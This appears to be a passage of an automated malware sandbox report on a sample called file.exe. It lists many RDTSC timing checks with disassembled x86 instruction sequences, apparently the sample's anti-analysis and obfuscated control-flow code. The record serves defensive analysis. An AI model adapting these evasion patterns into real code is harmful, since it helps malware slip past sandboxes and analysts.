                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF2A1 second address: 4EF2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF2A5 second address: 4EF2A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF2A9 second address: 4EF2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1497 second address: 4F149B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF2B6 second address: 4EF2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F149B second address: 4F1537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F95D526962Bh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F95D5269628h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 or dword ptr [ebp+122D2F8Bh], ecx 0x0000002f push dword ptr fs:[00000000h] 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 call 00007F95D5269628h 0x00000045 pop esi 0x00000046 mov dword ptr [esp+04h], esi 0x0000004a add dword ptr [esp+04h], 00000015h 0x00000052 inc esi 0x00000053 push esi 0x00000054 ret 0x00000055 pop esi 0x00000056 ret 0x00000057 mov dword ptr [ebp+1247B16Ch], edi 0x0000005d mov dword ptr [ebp+122D3335h], ebx 0x00000063 mov eax, dword ptr [ebp+122D08E9h] 0x00000069 jmp 00007F95D5269633h 0x0000006e push FFFFFFFFh 0x00000070 sub edi, 5EDBE7F9h 0x00000076 nop 0x00000077 pushad 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF2BA second address: 4EF2D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F446A second address: 4F446E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1537 second address: 4F153F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF2D7 second address: 4EF2E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F95D5269626h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F446E second address: 4F4472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4472 second address: 4F4478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4478 second address: 4F447D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F447D second address: 4F44F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F95D5269628h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 jng 00007F95D5269636h 0x0000002c jmp 00007F95D5269630h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 pop edi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F95D5269628h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 mov edi, dword ptr [ebp+122D2A88h] 0x00000057 push eax 0x00000058 pushad 0x00000059 jbe 00007F95D5269628h 0x0000005f push ecx 0x00000060 pop ecx 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 popad 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F35A7 second address: 4F35B1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F95D47CFB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F577E second address: 4F5782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5782 second address: 4F5788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F74C1 second address: 4F74C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F66B8 second address: 4F66BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F66BC second address: 4F66C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8446 second address: 4F845F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F95D47CFB26h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F95D47CFB2Ah 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F845F second address: 4F8464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FAB0B second address: 4FAB23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95D47CFB2Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FAB23 second address: 4FAB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D5269630h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FAB38 second address: 4FAB9E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F95D47CFB3Eh 0x00000008 jmp 00007F95D47CFB38h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 stc 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F95D47CFB28h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d add dword ptr [ebp+12457A81h], edx 0x00000033 push 00000000h 0x00000035 or bx, EAD1h 0x0000003a xchg eax, esi 0x0000003b jmp 00007F95D47CFB2Ch 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FBC20 second address: 4FBC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FBC24 second address: 4FBC2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FCC3B second address: 4FCC41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FDC39 second address: 4FDC48 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F95D47CFB26h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FDC48 second address: 4FDCC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F95D526962Ah 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F95D5269628h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 pushad 0x00000028 mov edi, 57AA0AE8h 0x0000002d and di, 9100h 0x00000032 popad 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F95D5269628h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f mov dword ptr [ebp+122DB6F2h], edx 0x00000055 push 00000000h 0x00000057 xor dword ptr [ebp+1245F84Dh], esi 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 push edx 0x00000062 pop edx 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FDCC5 second address: 4FDCD3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F95D47CFB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8594 second address: 4F85B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F95D5269626h 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 jl 00007F95D5269630h 0x00000018 jmp 00007F95D526962Ah 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FADAE second address: 4FADB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FADB2 second address: 4FADB8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FADB8 second address: 4FADE2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007F95D47CFB26h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007F95D47CFB39h 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FBDD9 second address: 4FBDDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FEC4A second address: 4FEC54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F95D47CFB26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7647 second address: 4F76A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269630h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d stc 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c mov bx, D869h 0x00000020 call 00007F95D5269633h 0x00000025 movzx ebx, dx 0x00000028 pop edi 0x00000029 mov eax, dword ptr [ebp+122D13ADh] 0x0000002f mov dword ptr [ebp+122D17E6h], ebx 0x00000035 push FFFFFFFFh 0x00000037 mov dword ptr [ebp+122D35DCh], ebx 0x0000003d nop 0x0000003e push edi 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FCE64 second address: 4FCE80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFAE5 second address: 4FFAEF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F95D526962Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFAEF second address: 4FFB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F95D47CFB28h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 js 00007F95D47CFB30h 0x00000029 jp 00007F95D47CFB2Ah 0x0000002f mov di, 1A92h 0x00000033 mov ebx, 558601B9h 0x00000038 push 00000000h 0x0000003a mov di, dx 0x0000003d push 00000000h 0x0000003f mov ebx, dword ptr [ebp+122D2A7Ch] 0x00000045 xchg eax, esi 0x00000046 push ecx 0x00000047 jmp 00007F95D47CFB2Bh 0x0000004c pop ecx 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F95D47CFB37h 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FDE8E second address: 4FDE92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FDE92 second address: 4FDEA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F95D47CFB26h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FDEA0 second address: 4FDEB2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F95D5269626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FDEB2 second address: 4FDEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FEE11 second address: 4FEE29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jg 00007F95D5269626h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F95D5269626h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 504488 second address: 50448C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50448C second address: 504492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509BA0 second address: 509BB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F95D47CFB26h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509BB8 second address: 509BBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509BBC second address: 509BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509D0B second address: 509D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D8FD second address: 50D93F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F95D47CFB32h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F95D47CFB33h 0x00000018 mov eax, dword ptr [eax] 0x0000001a ja 00007F95D47CFB34h 0x00000020 push eax 0x00000021 push edx 0x00000022 ja 00007F95D47CFB26h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50DA65 second address: 50DA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50DA69 second address: 50DA6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50DA6D second address: 50DA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F95D5269626h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50DA81 second address: 50DAAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007F95D47CFB39h 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F95D47CFB26h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50DB3C second address: 50DB56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269636h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50DB56 second address: 50DB5B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50FEDE second address: 50FEE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F95D5269626h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514EBD second address: 514EC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514EC2 second address: 514ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F95D5269626h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514ED5 second address: 514EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514EDB second address: 514EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F95D5269626h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F95D5269626h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515060 second address: 515079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5151D9 second address: 5151DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515793 second address: 5157B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F95D47CFB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F95D47CFB33h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5157B6 second address: 5157BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518F03 second address: 518F34 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F95D47CFB26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F95D47CFB3Ch 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52003B second address: 520053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F95D5269633h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E55A5 second address: 4CDE7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F95D47CFB31h 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d jmp 00007F95D47CFB33h 0x00000012 pop esi 0x00000013 nop 0x00000014 sub dword ptr [ebp+122D3644h], esi 0x0000001a lea eax, dword ptr [ebp+12487398h] 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F95D47CFB28h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a or ecx, dword ptr [ebp+122D34E1h] 0x00000040 nop 0x00000041 push ecx 0x00000042 jmp 00007F95D47CFB31h 0x00000047 pop ecx 0x00000048 push eax 0x00000049 jmp 00007F95D47CFB37h 0x0000004e nop 0x0000004f sub dword ptr [ebp+122D2FE0h], eax 0x00000055 call dword ptr [ebp+122D3288h] 0x0000005b push eax 0x0000005c push edx 0x0000005d jne 00007F95D47CFB2Ch 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5AB9 second address: 4E5ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5ABD second address: 4E5AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5AC7 second address: 4E5ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5E2B second address: 4E5E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F95D47CFB34h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E612B second address: 4E6131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6131 second address: 4E6136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6136 second address: 4E614C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F95D5269628h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F95D5269626h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6655 second address: 4E6659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E68A7 second address: 4E68AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E68AB second address: 4E68BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CEA85 second address: 4CEA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
